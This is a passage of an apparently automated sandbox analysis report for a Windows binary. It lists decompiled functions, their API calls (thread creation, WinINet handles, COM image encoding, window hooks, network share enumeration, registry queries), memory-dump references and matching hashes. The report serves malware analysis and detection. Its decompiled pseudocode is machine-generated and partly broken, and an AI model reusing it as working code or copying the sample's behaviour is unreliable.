                                                                                                                        • API String ID: 4196757001-0
                                                                                                                        • Opcode ID: 242f124db98905d00cf9128908feaab21299a1a8680d0f185ce4c86f49c5f521
                                                                                                                        • Instruction ID: 60893e5dad7e7ba502457eb07b1cbd069f2583410f47a50608a289a6c24bd7c8
                                                                                                                        • Opcode Fuzzy Hash: 242f124db98905d00cf9128908feaab21299a1a8680d0f185ce4c86f49c5f521
                                                                                                                        • Instruction Fuzzy Hash: 4E01F9B3B05A69ABD7119A789C859BBB39DDFC5661F04012AFA40D7200DB66DC0546A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F91F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97sleepnetworkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F91FC
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • GetTickCount.KERNEL32 ref: 004F9276
                                                                                                                        • InternetCloseHandle.WININET(?), ref: 004F92BF
                                                                                                                          • Part of subcall function 004B9004: shutdown.WS2_32(000000FF,00000001), ref: 004B901A
                                                                                                                          • Part of subcall function 004B9004: closesocket.WS2_32(000000FF), ref: 004B9026
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,BlockGuardThread,00000000,0000006C), ref: 004F92FE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$CloseCountDeleteHandleInitializeInternetSleepTickclosesocketshutdown
                                                                                                                        • String ID: BlockGuardThread
                                                                                                                        • API String ID: 4006895559-3235377368
                                                                                                                        • Opcode ID: 91f061a56682c373da9e5bf5c21ab94481fe2c56bedb5626e9856256ad66a46b
                                                                                                                        • Instruction ID: aebc0e39f4333073a657320902b044686f82bcc6320b268cb2b5a0bacd630e9b
                                                                                                                        • Opcode Fuzzy Hash: 91f061a56682c373da9e5bf5c21ab94481fe2c56bedb5626e9856256ad66a46b
                                                                                                                        • Instruction Fuzzy Hash: 66319C7190020DAFDB24EFA0C885BEEBBB5AF04315F10455EE6027B2D1DB796E49CB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004E9FA6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E9FAD
                                                                                                                        • CreateThread.KERNEL32 ref: 004E9FDD
                                                                                                                        • InterlockedIncrement.KERNEL32(0085F708), ref: 004EA018
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        Strings
                                                                                                                        • Thread.Create.Failed, xrefs: 004E9FF4
                                                                                                                        • CreateThread, not running yet, xrefs: 004EA01F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CreateCriticalIncrementInitializeInterlockedSectionThread
                                                                                                                        • String ID: CreateThread, not running yet$Thread.Create.Failed
                                                                                                                        • API String ID: 3278170271-1474816145
                                                                                                                        • Opcode ID: 9f708ba1ffea769834e1f08a032b6fea88a847d95f1b889b5fa2302948fccbc2
                                                                                                                        • Instruction ID: fa06a62da20e3ffc879d0189229f950c1cc712b5ae2b368708147620d2bae4ef
                                                                                                                        • Opcode Fuzzy Hash: 9f708ba1ffea769834e1f08a032b6fea88a847d95f1b889b5fa2302948fccbc2
                                                                                                                        • Instruction Fuzzy Hash: 0C112BB0500344BFDB24EF65CC859AE7BA4FF64351F00822EF511872D0D7746A04C755
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F336480, Relevance: 7.7, APIs: 5, Instructions: 205comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 50%
                                                                                                                        			E6F336480() {
				intOrPtr* _v24;
				intOrPtr _v40;
				void* _v104;
				void* _v112;
				intOrPtr* _v124;
				char _v128;
				char* _v132;
				char _v136;
				intOrPtr* _v140;
				intOrPtr* _v144;
				char _v148;
				intOrPtr* _v152;
				intOrPtr* _v160;
				void* _v164;
				intOrPtr _v168;
				intOrPtr* _v180;
				void* _v184;
				char _v192;
				short _v196;
				char _v200;
				intOrPtr* _v208;
				intOrPtr _v224;
				intOrPtr* _v236;
				intOrPtr* _v244;
				intOrPtr* _v256;
				intOrPtr* _v264;
				intOrPtr* _v276;
				char* _t66;
				intOrPtr* _t68;
				void* _t70;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t83;
				void* _t85;
				intOrPtr* _t86;
				void* _t88;
				intOrPtr* _t89;
				intOrPtr* _t91;
				void* _t93;
				intOrPtr* _t95;
				intOrPtr* _t98;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t108;
				void* _t110;
				intOrPtr* _t111;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr* _t116;
				short _t164;

				_t164 = 0;
				__imp__CoInitializeEx(0, 0);
				_t66 =  &_v104;
				_v104 = 0;
				__imp__CoCreateInstance(0x6f33db8c, 0, 1, 0x6f33ddac, _t66); // executed
				if(_t66 < 0) {
					L19:
					__imp__CoUninitialize();
					return _t164;
				}
				_t68 = _v124;
				_v112 = 0;
				_t70 =  *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x54))))(_t68,  *_v24, 0, 2,  &_v112); // executed
				if(_t70 < 0) {
					L18:
					_t71 = _v144;
					 *((intOrPtr*)( *((intOrPtr*)( *_t71 + 8))))(_t71);
					goto L19;
				}
				_t73 = _v144;
				_v136 = 0;
				_push( &_v136);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x38))))() < 0) {
					L17:
					_t76 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76); // executed
					goto L18;
				}
				_t78 = _v144;
				_push(_v40);
				_push(_t78);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x38))))() < 0) {
					L16:
					_t81 = _v152;
					 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 8))))(_t81);
					goto L17;
				}
				asm("movq xmm0, [0x6f33db9c]");
				_t83 = _v160;
				asm("movq [esp+0x30], xmm0");
				asm("movq xmm0, [0x6f33dba4]");
				_v164 = 0;
				asm("movq [esp+0x3c], xmm0");
				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x20))))(_t83, 0x6f33dbac,  &_v128,  &_v164); // executed
				if(_t85 < 0) {
					goto L16;
				}
				_t86 = _v180;
				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))(_t86, _v168, 2); // executed
				if(_t88 < 0) {
					L15:
					_t89 = _v192;
					 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
					goto L16;
				}
				_t91 = _v192;
				_v196 = 0;
				_v184 = 0;
				_t93 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x28))))(_t91,  &_v196,  &_v184); // executed
				if(_t93 >= 0) {
					L6F33C2EE();
					_v132 = L"ImageQuality";
					__imp__#8( &_v192,  &_v136, 0x20);
					asm("movss xmm0, [0x6f33da54]");
					_v196 = 4;
					_t95 = _v208;
					asm("movss [esp+0x2c], xmm0");
					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x10))))(_t95, 1,  &_v148,  &_v196);
					_t98 = _v236;
					_push(_v224);
					_push(_t98);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0xc))))() >= 0) {
						asm("movq xmm0, [0x6f33dbbc]");
						_t105 = _v244;
						_push(_v128);
						asm("movq [esp+0x40], xmm0");
						asm("movq xmm0, [0x6f33dbc4]");
						asm("movq [esp+0x48], xmm0");
						_push(_v132);
						_push(_t105);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x10))))() >= 0) {
							_t108 = _v256;
							_t110 =  *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x18))))(_t108,  &_v200); // executed
							if(_t110 >= 0) {
								_t111 = _v264;
								_t113 =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x2c))))(_t111, _v244, 0); // executed
								if(_t113 >= 0) {
									_t114 = _v276;
									_push(_t114);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0x30))))() >= 0) {
										_t116 = _v276;
										_push(_t116);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x2c))))() >= 0) {
											_t164 = 1;
										}
									}
								}
							}
						}
					}
					_t101 = _v244;
					 *((intOrPtr*)( *((intOrPtr*)( *_t101 + 8))))(_t101); // executed
					_t103 = _v236;
					 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103); // executed
				}
			}

























































                                                                                                                        0x6f336484
                                                                                                                        0x6f336488
                                                                                                                        0x6f33648e
                                                                                                                        0x6f3364a0
                                                                                                                        0x6f3364a4
                                                                                                                        0x6f3364ac
                                                                                                                        0x6f3366c9
                                                                                                                        0x6f3366c9
                                                                                                                        0x6f3366d5
                                                                                                                        0x6f3366d5
                                                                                                                        0x6f3364b2
                                                                                                                        0x6f3364c4
                                                                                                                        0x6f3364cf
                                                                                                                        0x6f3364d3
                                                                                                                        0x6f3366bd
                                                                                                                        0x6f3366bd
                                                                                                                        0x6f3366c7
                                                                                                                        0x00000000
                                                                                                                        0x6f3366c7
                                                                                                                        0x6f3364d9
                                                                                                                        0x6f3364e1
                                                                                                                        0x6f3364e7
                                                                                                                        0x6f3364e8
                                                                                                                        0x6f3364f0
                                                                                                                        0x6f3366b1
                                                                                                                        0x6f3366b1
                                                                                                                        0x6f3366bb
                                                                                                                        0x00000000
                                                                                                                        0x6f3366bb
                                                                                                                        0x6f3364f6
                                                                                                                        0x6f336500
                                                                                                                        0x6f336501
                                                                                                                        0x6f336509
                                                                                                                        0x6f3366a5
                                                                                                                        0x6f3366a5
                                                                                                                        0x6f3366af
                                                                                                                        0x00000000
                                                                                                                        0x6f3366af
                                                                                                                        0x6f33650f
                                                                                                                        0x6f336517
                                                                                                                        0x6f336524
                                                                                                                        0x6f33652a
                                                                                                                        0x6f336533
                                                                                                                        0x6f336537
                                                                                                                        0x6f336548
                                                                                                                        0x6f33654c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336552
                                                                                                                        0x6f336563
                                                                                                                        0x6f336567
                                                                                                                        0x6f336699
                                                                                                                        0x6f336699
                                                                                                                        0x6f3366a3
                                                                                                                        0x00000000
                                                                                                                        0x6f3366a3
                                                                                                                        0x6f33656d
                                                                                                                        0x6f33657a
                                                                                                                        0x6f33657e
                                                                                                                        0x6f336589
                                                                                                                        0x6f33658d
                                                                                                                        0x6f33659a
                                                                                                                        0x6f3365a4
                                                                                                                        0x6f3365ac
                                                                                                                        0x6f3365b2
                                                                                                                        0x6f3365c4
                                                                                                                        0x6f3365c9
                                                                                                                        0x6f3365d2
                                                                                                                        0x6f3365e0
                                                                                                                        0x6f3365e2
                                                                                                                        0x6f3365ec
                                                                                                                        0x6f3365ed
                                                                                                                        0x6f3365f5
                                                                                                                        0x6f3365ff
                                                                                                                        0x6f336607
                                                                                                                        0x6f33660b
                                                                                                                        0x6f336610
                                                                                                                        0x6f336616
                                                                                                                        0x6f33661e
                                                                                                                        0x6f336626
                                                                                                                        0x6f336627
                                                                                                                        0x6f33662f
                                                                                                                        0x6f336631
                                                                                                                        0x6f336640
                                                                                                                        0x6f336644
                                                                                                                        0x6f336646
                                                                                                                        0x6f336656
                                                                                                                        0x6f33665a
                                                                                                                        0x6f33665c
                                                                                                                        0x6f336665
                                                                                                                        0x6f33666a
                                                                                                                        0x6f33666c
                                                                                                                        0x6f336675
                                                                                                                        0x6f33667a
                                                                                                                        0x6f33667c
                                                                                                                        0x6f33667c
                                                                                                                        0x6f33667a
                                                                                                                        0x6f33666a
                                                                                                                        0x6f33665a
                                                                                                                        0x6f336644
                                                                                                                        0x6f33662f
                                                                                                                        0x6f336681
                                                                                                                        0x6f33668b
                                                                                                                        0x6f33668d
                                                                                                                        0x6f336697
                                                                                                                        0x6f336697

                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000), ref: 6F336488
                                                                                                                        • CoCreateInstance.OLE32(6F33DB8C,00000000,00000001,6F33DDAC,?), ref: 6F3364A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000020), ref: 6F33659A
                                                                                                                        • VariantInit.OLEAUT32 ref: 6F3365AC
                                                                                                                        • CoUninitialize.OLE32 ref: 6F3366C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitInitializeInstanceMemoryUninitializeVariantZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 884428471-0
                                                                                                                        • Opcode ID: b67523bdddf209c53f44a973d2dff45fd6fe49b1b54c34612766d1d332be107a
                                                                                                                        • Instruction ID: a9ac813da4e52ee20f93106de82698f31dffcf15b40d92ed829c1863a2887f0f
                                                                                                                        • Opcode Fuzzy Hash: b67523bdddf209c53f44a973d2dff45fd6fe49b1b54c34612766d1d332be107a
                                                                                                                        • Instruction Fuzzy Hash: A371D0B5604752AFD610DF69C880E5BB7F9AFC9744F108A5DF949CB260DB30E802CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F338100, Relevance: 7.6, APIs: 5, Instructions: 94stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 63%
                                                                                                                        			E6F338100(long _a4, WCHAR* _a8, signed int _a12, long _a16, signed int _a28, signed int _a32, struct HWND__* _a36, struct HMENU__* _a40, struct HINSTANCE__* _a44, void* _a48) {
				short _v520;
				signed int _t16;
				struct HWND__* _t21;
				long _t33;
				intOrPtr _t35;
				long _t37;
				WCHAR* _t38;
				int _t41;
				struct HWND__* _t53;

				_t33 = _a16;
				if((_t33 & 0x40000000) == 0 || _t33 < 0) {
					_t16 = 1;
					_t33 = _t33 & 0xefffffff;
					_t37 = 0x8000080;
				} else {
					_t37 = _a4;
					_t16 = 0;
				}
				asm("sbb eax, eax");
				_t21 = CreateWindowExW(_t37, _a8,  !( ~_t16) & _a12, _t33,  ~_a28,  ~_a32, 0, 0, _a36, _a40, _a44, _a48); // executed
				_t53 = _t21;
				_t41 = GetClassNameW(_t53,  &_v520, 0x103);
				if(_t41 <= 0) {
					L10:
					return _t53;
				} else {
					_t38 = M6F340560; // 0x77fbf8
					if(lstrcmpiW( &_v520, _t38) != 0) {
						if(_t41 > 1) {
							_t35 = M6F340558; // 0x7982c4
							if(lstrcmpiW( &_v520, _t35 + 2) == 0) {
								_push(4);
								_push(_t53);
								 *0x6f34039c = _t53; // executed
								M6F3405B8(); // executed
								_push(0x1a);
								_push(1);
								_push(1);
								_push(0);
								_push(0);
								_push(0);
								_push(_t53);
								M6F3405C4();
							}
						}
						goto L10;
					} else {
						DestroyWindow(_t53); // executed
						return 0;
					}
				}
			}












                                                                                                                        0x6f338100
                                                                                                                        0x6f338110
                                                                                                                        0x6f3381c6
                                                                                                                        0x6f3381cb
                                                                                                                        0x6f3381d1
                                                                                                                        0x6f33811e
                                                                                                                        0x6f33811e
                                                                                                                        0x6f338125
                                                                                                                        0x6f338125
                                                                                                                        0x6f338163
                                                                                                                        0x6f33817a
                                                                                                                        0x6f338189
                                                                                                                        0x6f338193
                                                                                                                        0x6f338197
                                                                                                                        0x6f338217
                                                                                                                        0x6f338222
                                                                                                                        0x6f338199
                                                                                                                        0x6f338199
                                                                                                                        0x6f3381af
                                                                                                                        0x6f3381de
                                                                                                                        0x6f3381e0
                                                                                                                        0x6f3381f3
                                                                                                                        0x6f3381f5
                                                                                                                        0x6f3381f7
                                                                                                                        0x6f3381f8
                                                                                                                        0x6f3381fe
                                                                                                                        0x6f338204
                                                                                                                        0x6f338206
                                                                                                                        0x6f338208
                                                                                                                        0x6f33820a
                                                                                                                        0x6f33820c
                                                                                                                        0x6f33820e
                                                                                                                        0x6f338210
                                                                                                                        0x6f338211
                                                                                                                        0x6f338211
                                                                                                                        0x6f3381f3
                                                                                                                        0x00000000
                                                                                                                        0x6f3381b1
                                                                                                                        0x6f3381b2
                                                                                                                        0x6f3381c3
                                                                                                                        0x6f3381c3
                                                                                                                        0x6f3381af

                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(08000080,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 6F33817A
                                                                                                                        • GetClassNameW.USER32 ref: 6F33818D
                                                                                                                        • lstrcmpiW.KERNEL32(0077FBF8,0077FBF8), ref: 6F3381AB
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 6F3381B2
                                                                                                                        • lstrcmpiW.KERNEL32(007982C2,007982C2), ref: 6F3381EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Windowlstrcmpi$ClassCreateDestroyName
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2351571968-0
                                                                                                                        • Opcode ID: 0b2de832266c3c3bf70dd8854cec51ade220f0203205bfff281bcd4033c864e7
                                                                                                                        • Instruction ID: f7c36f7a8f2a3fa451227185245e1935a44bf41670ded956ebe92e91c3711808
                                                                                                                        • Opcode Fuzzy Hash: 0b2de832266c3c3bf70dd8854cec51ade220f0203205bfff281bcd4033c864e7
                                                                                                                        • Instruction Fuzzy Hash: 5E31D273A59761ABE720DA68CC45FEB73ACEB89720F04090DFA55D3180D674A804CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0050BFDE, Relevance: 7.6, APIs: 5, Instructions: 77shareCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0050BFE5
                                                                                                                        • WNetOpenEnumW.MPR(?,?,?,?,?), ref: 0050C04A
                                                                                                                        • SetLastError.KERNEL32(00000000,00000060,0050C216,00000000,00000002), ref: 0050C059
                                                                                                                        • WNetEnumResourceW.MPR(?,00000001,00000000,00000002), ref: 0050C06B
                                                                                                                        • WNetCloseEnum.MPR(?), ref: 0050C0AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$CloseErrorH_prolog3_catchLastOpenResource
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1630679584-0
                                                                                                                        • Opcode ID: bdf23ed479f09aa7ed804e3d7078131f8f9a979f425e6cc3bab5c3f2139a4766
                                                                                                                        • Instruction ID: 2b01ff344b20b8029a7cce6901f340b1641c3885abb451ca6fb145d16302bfdd
                                                                                                                        • Opcode Fuzzy Hash: bdf23ed479f09aa7ed804e3d7078131f8f9a979f425e6cc3bab5c3f2139a4766
                                                                                                                        • Instruction Fuzzy Hash: 76218D7250020AEFDF229F94CC599EE7FB6FF4A300F104629FA55A61A2C7368A51DB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004EA0E3, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA0EA
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 004EA12F
                                                                                                                        • SetThreadPriority.KERNEL32(00000000), ref: 004EA136
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CurrentH_prolog3Priority
                                                                                                                        • String ID: TM.
                                                                                                                        • API String ID: 2855252584-234185721
                                                                                                                        • Opcode ID: 51319c999e5b96366f920d5d8bd5fd6d2027de0bb845c39c702a42dffdf2b1c4
                                                                                                                        • Instruction ID: 5a6ade4841129d6a3cde0beb062699e4024c79fba2f0859787c63aaf8a2f2e76
                                                                                                                        • Opcode Fuzzy Hash: 51319c999e5b96366f920d5d8bd5fd6d2027de0bb845c39c702a42dffdf2b1c4
                                                                                                                        • Instruction Fuzzy Hash: AE115C71904288AAEB21EBAAC845D5EBB75BF61355F14461FF002971D2D63CAE04C72A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004D8D4F, Relevance: 6.1, APIs: 4, Instructions: 112registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004D8D56
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,0000003C,004D8EFD,?,?), ref: 004D8DAB
                                                                                                                        • _wmemset.LIBCPMT ref: 004D8DEE
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D8E13
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
